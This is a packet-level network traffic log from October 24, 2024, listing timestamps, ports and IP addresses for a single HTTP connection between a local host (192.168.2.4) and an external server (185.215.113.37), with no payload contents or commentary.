Oct 24, 2024 19:29:19.549185991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549196959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549206972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549207926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549217939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549241066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549267054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549307108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549316883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549325943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549346924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549364090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549376011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549386024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549387932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549417973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549433947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549446106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549462080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549473047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549484015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549494982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549496889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549525023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549540043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549546003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549664021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549668074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549675941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549685955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549696922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549702883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549711943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549721956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549726009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549736023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549737930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549751043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549760103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549791098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.549804926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.549839973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550015926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550028086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550038099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550049067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550056934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550060987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550081968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550096035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550107002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550108910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550118923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550131083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550137997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550143003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550154924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550162077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550165892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550172091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550177097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550188065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550199032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550199986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550216913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550237894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550311089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550323009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550333023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550344944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550355911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550358057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550374985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550399065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550471067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550481081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550492048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550502062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550513029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550515890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550524950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550535917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550543070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550548077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550560951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550579071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550579071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550611019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550627947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550638914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550676107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550714016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550725937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550736904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550748110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550749063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550760031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550771952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550772905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550782919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550793886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550796032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550805092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550815105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550817013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.550868034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.550868034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551064014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551075935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551086903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551096916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551107883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551111937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551120043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551136017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551146984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551151037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551162004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551168919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551173925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551184893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551194906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551197052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551208019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551211119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551218987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551229954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551237106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551242113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551251888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551253080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551265955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551274061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551299095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551326036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551351070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551362991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551374912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551381111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551393032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551431894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551556110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551565886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551574945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551588058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551599026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551599979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551610947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551623106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551634073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551635981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551644087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551651001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551656961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551667929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551672935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551680088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551687002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551692009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551708937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.551714897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.551745892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.654825926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.660938978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938538074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938554049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938575029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938591957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938605070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938615084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938626051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938635111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938641071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938672066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938679934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938684940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938698053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938698053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938708067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938724995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938734055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938766003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938777924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938787937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938802004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938847065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938848019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938848019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938858986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938868999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938894033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938901901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938914061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938920021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938920021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938926935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938936949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938947916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.938956976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.938956976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939001083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939001083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939033031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939043045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939052105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939062119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939073086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939083099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939097881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939167023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939177036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939192057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939194918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939203978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939213991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939222097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939222097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939224005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939245939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939349890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939359903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939368010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939379930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939387083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939388990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939397097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939400911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939425945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939444065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939455032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939470053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939471960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939486027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939500093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939616919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939629078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939639091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939650059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939651012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939673901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939707041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939718962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939728975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939733028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939739943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939754009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939775944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939775944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939910889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939923048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939933062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939939022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939943075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939954042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939965010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939973116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939973116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.939975977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.939986944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940010071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940062046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940072060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940080881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940089941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940090895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940104008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940113068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940120935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940120935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940126896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940152884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940215111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940229893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940238953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940243006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940248966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940258980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940267086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940280914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940362930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940373898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940383911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940392017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940392971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940423012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940423012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940488100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940499067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940506935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940514088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940519094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940530062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940540075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940543890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940551043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940560102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940563917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940571070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940576077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940623999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940623999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940804005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940815926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940826893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940836906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940846920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940859079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940870047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940871954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940881968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940893888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940901995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:19.940907001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940907955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940951109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:19.940951109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.055782080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055798054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055815935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055836916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055849075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055859089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055871964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055882931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055895090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055905104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055916071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055932999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.055932999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.055937052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055932999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.055948973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055958986 CEST	80	49730	185.215.113.37	192.168.2.4
